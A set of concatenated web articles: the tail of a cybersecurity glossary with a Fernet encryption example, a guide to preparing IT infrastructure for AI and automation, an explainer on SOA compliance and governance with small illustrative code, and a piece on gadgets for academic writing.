It is typically fully integrated with the rest of the security stack, threat-focused, and delivers comprehensive, unified policy management of firewall functions, application control, threat prevention, and advanced malware protection from the network to the endpoint. Security information and event management (SIEM): This is a broad term for products that deal with security information management (SIM) and security event management (SEM). These systems allow for aggregation of information and events into a single “pane of glass” for security teams to use. Secure web gateway (SWG): This is a proxy that can log and inspect all of your web traffic for greater transparency, control, and protection. It allows for real-time inspection of inbound files for malware, sandboxing, full or selective SSL decryption, content filtering, and the ability to block specific user activities in select apps. Secure internet gateway (SIG): This is a cloud-delivered solution that unifies a variety of connectivity, content control, and access technologies to provide users with safe access to the internet, both on and off the network. By operating from the cloud, a SIG protects user access anywhere and everywhere, with traffic routing to the gateway for inspection and policy enforcement regardless of what users are connecting to, or where they’re connecting from. Because a SIG extends security beyond the edge of the traditional network — and without the need for additional hardware or software — thousands of enterprises have adopted it as a modern catch-all for ensuring that users, devices, endpoints, and data have robust protection from threats. Secure access service edge (SASE): Gartner introduced an entirely new enterprise networking and security category called “secure access service edge.” SASE brings together networking and security services into one unified solution designed to deliver strong security from edge to edge — in the data center, at remote offices, with roaming users, and beyond. By consolidating a variety of powerful point solutions into one solution that can be deployed anywhere from the cloud, SASE can provide better protection and faster network performance, while reducing the cost and work it takes to secure the network. Cybersecurity is always evolving, and it can be hard to keep up with the rapid pace of changes. Be sure to bookmark this blog post – we’ll keep it up to date as new threats and technologies emerge. To learn more, check out our recent blog posts about cybersecurity research. Don’t be shy!
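As a hands-on footnote to the Encryption entry above, here is a small illustration of symmetric encryption and decryption; it assumes the third-party Python cryptography package is installed, and it is meant only to make the definition concrete, not to prescribe a particular library or key-management approach.

```python
# Small illustration of symmetric encryption using the third-party
# "cryptography" package's Fernet recipe (pip install cryptography).
from cryptography.fernet import Fernet

key = Fernet.generate_key()        # secret key shared by sender and recipient
cipher = Fernet(key)

token = cipher.encrypt(b"Quarterly results attached")  # scrambled message
print(token)                        # unreadable without the key

print(cipher.decrypt(token))        # b'Quarterly results attached'
```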
<urn:uuid:9a435f14-6a1c-4ea8-899e-c0ce4deb1ecb>
CC-MAIN-2024-38
https://www.channele2e.com/native/cybersecurity-terms-and-threats-a-glossary-for-you
2024-09-13T08:17:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00776.warc.gz
en
0.925234
2,666
2.921875
3
Preparing for AI and Automation It is undeniable that Artificial Intelligence and Automation are on the minds of the public. With major corporations such as Google, Amazon, Facebook, and Microsoft making the news on their artificial-intelligence research and products, and personalities such as Elon Musk, Bill Gates, and Stephen Hawking holding interviews warning of an A.I. apocalypse, it's no wonder people are talking about it. Artificial Intelligence has recently migrated into Information Technology, with several companies providing solutions for IT Operations. Executives and managers are quickly eyeing it up, excited by its ability to make employees more efficient, reduce downtime, and minimize staffing. The marketing for these products is very positive, extolling the simplicity of operations and their effectiveness. The algorithms, as it is explained, will handle everything. There is a configuration cost to get it up and running and to keep it running smoothly that management may not see at first. There is no "Easy" button here. Depending on the organization, implementing an A.I. and automation platform may require thousands of hours of work. This article aims to provide some thoughts on prerequisites to using A.I. in your IT infrastructure. The first requirement is management access. These A.I. algorithms work with large amounts of data. They want to see everything, so it can be potentially correlated. Thus, we need access to everything from where the A.I. system will be installed. All devices need to be accessible via some form of management network, including servers, switches, routers, firewalls, power strips, UPSs, KVMs, and more. Effectively, anything that has the option of connecting an Ethernet cable and configuring an IP address needs to have that done. Unless you have an existing inventory of every device that uses a power cable, this step will probably also require a full inventory of all equipment at every location. Many of these devices may be managed by other departments as well, requiring internal resources and collaboration. This is also an important step for many other reasons, and is highly recommended before continuing. Be sure to name these devices in a consistent manner. Most of the algorithms in use rely on similar wording between devices in a logical or physical area in order to increase matching probability. This will require the formulation of a corporation-wide naming standard, and potentially renaming hundreds or thousands of devices (a minimal check of such a convention is sketched below). Regarding the network itself, depending on your environment, you may not have a management network, or you may have an unfinished one. So you'll need to design and create one for each of your locations, and get that routed properly. Or, maybe you have a very large environment with many management networks for various purposes and departments. Those will need to be identified, routes may need to be created, VPN SAs may need reconfiguration, and ACLs opened to the location of the A.I. system. Now that there is a management network that can communicate between all devices and your A.I. system, you need to provide management services to it. The first thing that comes to mind is SNMP. A modern network should have SNMPv3 configured if a device supports it, which requires some security design effort as well. MIBs may have to be found, or OIDs walked. Devices will need to be configured to report all SNMP traps possible, and to allow polling from the A.I. collector. 
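As an aside, the naming-standard requirement mentioned above can be enforced mechanically before the inventory is handed to the A.I. platform; the convention and device names below are invented purely for illustration.

```python
import re

# Minimal sketch of validating a device-naming standard before feeding an
# inventory to an A.I. platform. The convention shown (site-role-number,
# e.g. "nyc1-sw-01") and the device names are hypothetical.
NAME_PATTERN = re.compile(r"^[a-z]{3}\d-(rtr|sw|fw|srv|ups)-\d{2}$")

inventory = ["nyc1-sw-01", "nyc1-rtr-01", "CoreSwitch_B", "lax2-ups-03"]

nonconforming = [name for name in inventory if not NAME_PATTERN.match(name)]
print("Devices to rename:", nonconforming)   # ['CoreSwitch_B']
```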
Next up would be Syslog, preferably with encryption where each device supports it. This step would be best designed with a series of Syslog collection servers, local to each location, then forwarding those localized collections to the A.I. collector. This would require design and implementation time for such a distributed Syslog system. Part of that system would most likely include an ELK stack implementation on top of it for additional analysis, which can be very involved. There may be other monitoring systems already in place, performing up/down detection, resource utilization alerting, and synthetic transactions. Similarly, systems such as vCenter and AWS CloudWatch may be used. Each of these systems would need to be configured to copy all alerts to the A.I. collector. These configurations may also need to be customized for the collector, as the A.I. will want to know about events sooner and more frequently than an email alert to IT personnel. It's very likely these reporting systems may send alerts to a ticketing system or collaboration service, which should also be integrated into the A.I. platform as an output. Once the algorithms detect a highly probable issue, a ticket can be created for front-line personnel. This may also require configuration and scaling considerations for your email server, depending on how it is integrated. So far, we've talked about the setup of the networked devices, to allow for detection of issues. Once these alerts are investigated, they need an action performed. If an organization wishes to enable automation, that is, the automatic resolution of alerts from these A.I. systems, there needs to be remote management access provided to all devices. Not in the form of data flow from the networked devices, but the remote access of them. Remote access methods such as SSH and PowerShell are the most common today. If a device is too old or not licensed to run SSH or PowerShell, for example, that device will need to be replaced or upgraded. The configuration of this remote access requirement may also be lengthy. The automation methods provided usually rely on scripts of some kind. These are scripts you may want to run via an automation system such as Ansible, rather than as individual shell scripts. Again, we find a system that needs planning and implementation. This also requires personnel to write resolution scripts and playbooks for each issue that is detected, which would require personnel who know how to code and would certainly take a lot of time initially. Finally, these A.I. alerts and resolutions only happen when the algorithm has a high level of confidence that an issue is correct. That means personnel need to train the system, especially in the beginning. There are usually many algorithms that work together, each one using a different set of rules, which requires care and validation. Algorithms are diverse and may include the ability to detect relationships between alerts based on source type, physical or logical proximity, time, language usage, and topology analysis. As you can see, there is no "Easy" button here. A.I. platforms, their automation systems, and their algorithms are extremely powerful today, but they require planning, lots of preparatory work, and training once running. They cannot be implemented quickly, as a quick fix for lack of enough personnel, and in fact, will require more personnel during the implementation and configuration phase. When properly planned for and implemented, an A.I. system can be an important enhancement to IT Operations.
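To make the resolution-script idea above concrete, here is a minimal sketch of mapping detected alerts to remediation actions behind a confidence threshold; every name in it is hypothetical, and a production setup would typically hand these actions to an automation system such as Ansible and log everything it does.

```python
# Minimal sketch of mapping A.I.-detected alerts to remediation actions.
# All alert types and handler functions are hypothetical.

def restart_service(alert):
    print(f"[{alert['device']}] restarting {alert['detail']}")

def clear_disk_space(alert):
    print(f"[{alert['device']}] rotating logs to free space on {alert['detail']}")

def open_ticket(alert):
    print(f"[{alert['device']}] confidence too low, opening a ticket for staff")

REMEDIATIONS = {
    "service_down": restart_service,
    "disk_full": clear_disk_space,
}

CONFIDENCE_THRESHOLD = 0.90  # only automate highly probable findings

def handle_alert(alert):
    handler = REMEDIATIONS.get(alert["type"])
    if handler and alert["confidence"] >= CONFIDENCE_THRESHOLD:
        handler(alert)
    else:
        open_ticket(alert)

if __name__ == "__main__":
    handle_alert({"type": "disk_full", "device": "web01",
                  "detail": "/var/log", "confidence": 0.97})
    handle_alert({"type": "service_down", "device": "db02",
                  "detail": "postgresql", "confidence": 0.62})
```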
<urn:uuid:b252550a-a9e7-4659-9f7a-eb286aa09af1>
CC-MAIN-2024-38
https://ine.com/blog/preparing-for-ai-and-automation
2024-09-14T14:50:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00676.warc.gz
en
0.959728
1,419
2.734375
3
What is SOA? SOA stands for service-oriented architecture, and it is an architecture that allows organizations to use services to achieve IT goals. Systems are designed over a network using a communications protocol, and using SOA as a framework can greatly simplify a variety of processes and reduce the costs of doing business. Additionally, SOA can make it easier for organizations to adhere to government regulations and meet service level agreements. SOA allows organizations to create a framework that works for their needs. As with other IT architectures, there is no set way of doing things, just a guide for figuring out how to do them. The thing that sets SOA apart from other architectures is that it involves making services work together within programs and processes to create a framework. There are several definitions, but, generally speaking, a service is a self-contained unit that provides a function, such as handling currency exchanges or collecting data put in by a user. Working together, services can be combined to make larger applications function, and they are able to share data across computers and systems. Services can share data between each other automatically, so they are able to be used by a wide variety of users and programs. Using the same set of services in a large number of programs can represent an enormous savings in terms of time and development efforts for an organization. SOA compliance involves following processes put in place by the organization that created the framework, and compliance with SOA can allow businesses to also be in compliance with government regulations. For instance, if a law requires businesses to maintain a change log that is updated whenever a particular file is modified, the business can set their SOA framework up to require that a service perform this task. By complying with the SOA, the business will also be complying with the government regulation. (This article is part of our Security & Compliance Guide. Use the right-hand menu to navigate.) Who uses SOA? Large businesses and the government tend to be the most common users of SOA, and this is often due to the need to both follow a variety of regulations and share data across a wide range of users and systems. Initially, businesses were the first to take advantage of SOA, but in the last decade or so, the government has made a concerted effort to use SOA in both state and federal systems. As mentioned, one of the strong points of SOA is that it uses services to create functionality. Government entities are required to share vast amounts of data with other entities on a regular basis. Take state licensing systems. Even within the same state, there are several offices that are responsible for different tasks but need the same data to accomplish them. Counties will often handle data gathering and distribution of driver’s licenses, but state offices are normally the ones that revoke people’s driving privileges. Without a framework like SOA, each county may have its own program that collects and stores data about citizens and their driving records, and the state may have yet another. This can create enormous amounts of redundancy and problems getting databases to communicate properly. However, with SOA, all involved organizations can use the same services to collect, maintain and access data. Businesses with a variety of locations and divisions benefit from SOA for many of the same reasons. 
Data sharing is often much simpler because data comes from the same services and programs instead of being patchworked together, and if there are problems, it is easier to determine where they are coming from. Maintaining security and handling upgrades are also less challenging when applications use the same services.
Businesses frequently use SOA to follow guidelines put in place either by the business itself or by the government. There are numerous IT regulations that different industries must follow, and many of them do not prescribe an architecture. The health care industry, for example, has to follow a range of rules and requirements for handling medical records. SOA allows businesses to create a framework with security measures and data protections built in, which can make proving compliance with government standards much easier. Businesses can provide their framework to auditors and then demonstrate that they are following the framework they set up. Reporting mechanisms can be made part of the architecture, making the compliance process relatively simple and transparent.
While there are a number of benefits to using SOA to create a framework for an organization, there are potential pitfalls as well. For SOA to work effectively, it requires discipline in implementation and use. Although the architecture can be applied in a slow and progressive manner (one service at a time), it will not work properly if it is used piecemeal. If the goal is not to eventually end up with a system that complies with the SOA architecture, the result is usually a mishmash of services and programs that do not fit together well or live up to expectations.
The majority of businesses and organizations currently adopting SOA already have a framework in place. There are few cases where an organization can completely eliminate its current framework and start from scratch, so SOA adoption is almost always a transition; the exception is new organizations that have nothing in place. As with most architectures, it is necessary to establish what an organization needs to accomplish. From there, it is a matter of determining which functions are a priority and accomplishing goals and integrations in a set order. Where a business has an established and functioning framework, the analysis may focus on determining where the most overlap is and then prioritizing the creation of services that can be used by the largest number of applications.
SOA is built from a set of parts that allow services to work together. Some of the major components it relies upon are the following.
Service Oriented Enterprise (SOE): The SOE lists the processes and procedures used to create and maintain the SOA. It also frequently names the individuals who make the rules for running the SOA and who are responsible for ensuring that goals are met.
Service Oriented Infrastructure (SOI): This is the environment the services run on, responsible for ensuring that services can connect and communicate properly. In a very general sense, the SOI can be likened to an operating system for services and processes.
Service registry: A critical part of the SOA, the registry lists all available services and includes information, via service metadata, about what they do and how they can be used. A service registry prevents redundancy and makes it easier to determine which processes still need to be built.
Business processes: These are what allow services to function together to complete tasks. An example is emailing customers a monthly statement: one service collects customer data, another pulls an individual's transactions for the last 30 days, and yet another sends out the automated emails; the business process is what makes them all work together (a brief sketch of this composition appears just after these component descriptions).
Master data management (MDM) hub: An MDM hub takes information and data from a variety of sources and standardizes how it is stored and accessed. MDM hubs can be set up in several ways, but their goal is to eliminate duplicate data, provide formatting standards, and ensure that data is accurate and accessible to the services that need it.
Data management: Handling and sharing data are easier with services that limit the number of input sources, but a robust data management plan is still a necessary part of SOA. A variety of services may be used to collect different types of data, and data may also come from outside the organization, so data management is used to create policies for handling, tracking, and securing data.
Enterprise service bus (ESB): The ESB allows services in a framework to communicate with each other across different applications and processes. It is frequently used by the MDM hub to access data and messages from applications; it is a system that enables communication, not one that manages data.
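As a rough illustration of the business-process idea above, the sketch below composes three hypothetical services — customer lookup, transaction history, and email delivery — into the monthly-statement process from the component descriptions. The service names and interfaces are invented for this example, and the services are stubbed as local functions; in an actual framework they would be separate components invoked through the ESB or another integration layer.

```python
from dataclasses import dataclass


@dataclass
class Customer:
    customer_id: str
    email: str


def get_customers():
    """Service 1: collects customer data (stubbed with sample records)."""
    return [Customer("C-1", "jane@example.com"), Customer("C-2", "raj@example.com")]


def get_transactions(customer_id, days=30):
    """Service 2: pulls a customer's transactions for the last N days (stubbed)."""
    return [{"customer_id": customer_id, "amount": 42.50}]


def send_email(address, body):
    """Service 3: sends the automated email (stubbed as a print)."""
    print(f"Sending statement to {address}: {body}")


def monthly_statement_process():
    """The business process: the orchestration that makes the three services work together."""
    for customer in get_customers():
        transactions = get_transactions(customer.customer_id, days=30)
        total = sum(t["amount"] for t in transactions)
        send_email(customer.email, f"{len(transactions)} transactions, total {total:.2f}")


monthly_statement_process()
```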
Adhering to SOA governance is a way of ensuring that an organization's systems continue to work properly, and it can also be a starting point for verifying compliance with legal regulations. Governance is often used as well to demonstrate that information is secure, something that may be important to users, stakeholders, and investors. An SOA audit will mean different things for different organizations depending on their goals, but common topics include ensuring that security protocols are in place and that services are created and managed properly. Audits normally rely on reporting to verify that systems are working correctly, and they may also check that the framework is addressing the needs and obligations of the organization.
Although security is often easier to establish with an SOA framework because there are fewer working parts, that does not mean it is not a major concern. SOA still requires that organizations put user authentication in place across applications and environments and ensure that services and applications cannot easily be accessed by unauthorized parties. Reporting systems are also essential to showing how well a framework is performing. Quality-of-service and error reporting are key to verifying that services are working quickly and without problems, and they may also help prove that SLAs are being met. Reporting helps an organization determine if and where there are problems, and it demonstrates to outside parties that the framework and the organization are doing their jobs properly. Coupled with the importance of reporting is reviewing the requirements for a system on a regular basis and ensuring that they are being tracked and met. The government frequently refines or clarifies regulations that organizations must meet, so SOA governance will need to be updated to reflect these changes. Requirements or obligations may also change based on new SLAs or expectations from stakeholders, and an SOA will not remain viable if it is not updated to address the needs of the organization.
Service creation and management are another critical part of SOA governance because they sit at the heart of the architecture. If services are not managed properly, it defeats the purpose of using SOA to create a framework. It is crucial that services are created and made available with as little redundancy as possible. Services should be reused rather than recreated, and to help this process, documentation and information about services should be readily available and robust. Services must also be properly maintained and monitored to ensure that they can meet user demand; when large numbers of users are involved, scalability can turn into a problem that results in errors, slow response times, corrupted data, and failure to meet SLAs or government regulations.
A major part of ensuring that SOA governance requirements are met is having specific guidelines and processes for creating services, ensuring interoperability, and maintaining the framework, and specific people need to be named as responsible for making this happen. Without named individuals in charge of making choices, it can be difficult for companies to address problems or make needed alterations to their SOA framework and governance. As with other architectures, complying with procedures and ensuring that objectives are met is an ongoing process. Networks and systems are constantly changing, creating nearly endless opportunities for things to go wrong, and business obligations are also frequently in flux. New innovations, requests from users, and the ever-present issue of security prevent organizations from ever being done with ensuring compliance with SOA.
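Because so much of this governance guidance comes down to making services discoverable and reusable, here is one last minimal sketch of the service-registry idea mentioned among the components. The metadata fields, endpoint, and lookup behavior are invented for illustration; a production registry would be a dedicated directory or repository product, not an in-memory dictionary.

```python
from dataclasses import dataclass, field


@dataclass
class ServiceRecord:
    """The metadata a registry keeps so services can be discovered and reused."""
    name: str
    description: str
    endpoint: str                      # where the service can be reached
    owner: str                         # who is responsible for it (governance)
    tags: list = field(default_factory=list)


class ServiceRegistry:
    def __init__(self):
        self._services = {}

    def register(self, record):
        if record.name in self._services:
            raise ValueError(f"{record.name} is already registered; reuse it instead")
        self._services[record.name] = record

    def find(self, tag):
        """Before building a new service, check whether one already exists."""
        return [r for r in self._services.values() if tag in r.tags]


registry = ServiceRegistry()
registry.register(ServiceRecord(
    name="customer-data",
    description="Collects and serves customer master data",
    endpoint="https://esb.example.internal/customer-data",   # hypothetical endpoint
    owner="data-platform-team",
    tags=["customer", "mdm"],
))
print([r.name for r in registry.find("customer")])   # ['customer-data']
```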
<urn:uuid:779eb26e-d1d4-4c01-9291-64e134a479e0>
CC-MAIN-2024-38
https://www.bmc.com/blogs/security-soa-compliance/
2024-09-14T13:58:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00676.warc.gz
en
0.965141
2,362
3.421875
3
What does one need in creative writing? Imagination, a strong vocabulary, and good research skills are essential, but the tools of the trade can and must be adapted to the digital age. Academic writing demands original ideas about well-researched topics, persuasive and sophisticated writing, and timely submission. It also means focusing on a given topic without ignoring other classes, and still finding free time for the people who are or will become your friends. Gadgets can make the educational process more efficient, and they can also add a bit of fun to the mix that is modern education.
"The hurrier I go, the behinder I get"
This might be a grammatically questionable quote, but it describes academic writing perfectly. Time is of the essence for students around the world, and it is not easy to plan every minute just right. To make things worse, students regularly spend up to 70 hours per week handling their classes and academic projects. That workload might seem productive at first, but it probably erodes creativity and productivity overall. Students are regularly exposed to stressors such as challenging assignments, practice, and projects, as well as the need to adapt to a new and different environment. If the stress persists, it can lead to Burnout Syndrome. Burnout is a response to the daily stressors of student life, and it affects creativity and productivity as well as academic performance, self-esteem, and psychological health. Creative writing is one of the tasks many students find challenging at first, but it can also help them fight burnout with the support of modern gadgets. After all, technology makes our lives easier and better in many ways, and it can help students when they write.
Every story needs a hero
The writer may be the true hero of the story, but every Batman needs a Robin, and so do academic and working writers everywhere. Tools, tips, and gadgets are the sidekicks any writer needs. But what are the best gadgets for academic writing in the digital age? Technology comes at a price, so the right gadgets for a student are those that provide real benefits with little or no drawbacks. Smartphones may not make the list: they are not cost-efficient when it comes to academic writing, and they are sure to provide plenty of distractions.
Gadgets that help students save time
Students often feel that time is ticking away at an alarming rate, especially when they are juggling tasks and projects; feeling overwhelmed sets in quickly, and Burnout Syndrome may be just one step away. Gadgets that help them save time for fun and play are a good investment in their health, productivity, and creativity. This might mean investing in a new laptop that gives them ultraportable power to analyze and write as they please.
Gadgets that help students read and research
Extensive reading is a big part of the educational process, especially when it comes to academic writing. E-readers like Amazon's Kindle or Kobo were designed to make reading more enjoyable and accessible, and they are cost-efficient gadgets that give students a custom-made library on the go. Newer models include features like built-in lighting for reading in the dark and 3G connectivity, making them well suited to campus life. What's more, e-readers make notes and research available at a touch, without the drawbacks of paperbacks.
Gadgets that make students healthier and happier
Wearables are often used to gather data about users' health and wellbeing, prompting them to change their habits if needed. Considering that students everywhere fight stress and fatigue, wearables seem like a natural fit. Some smart devices also double as planners: users create a schedule and are later reminded of the tasks they need to complete. That feature is handy for keeping track of multiple writing tasks and lets students fold academic writing into their routine.
Technology opens up new possibilities for academic and working writers everywhere. While students are regularly exposed to stressors and burnout, the digital age has given them new tools to fight old foes and save time. After all, there is no writing without living.
<urn:uuid:138cf583-66df-4b4f-81ba-1327edf07625>
CC-MAIN-2024-38
https://educationcurated.com/editorial/how-to-use-gadgets-in-creative-academic-writing/
2024-09-15T19:56:57Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00576.warc.gz
en
0.96385
875
2.703125
3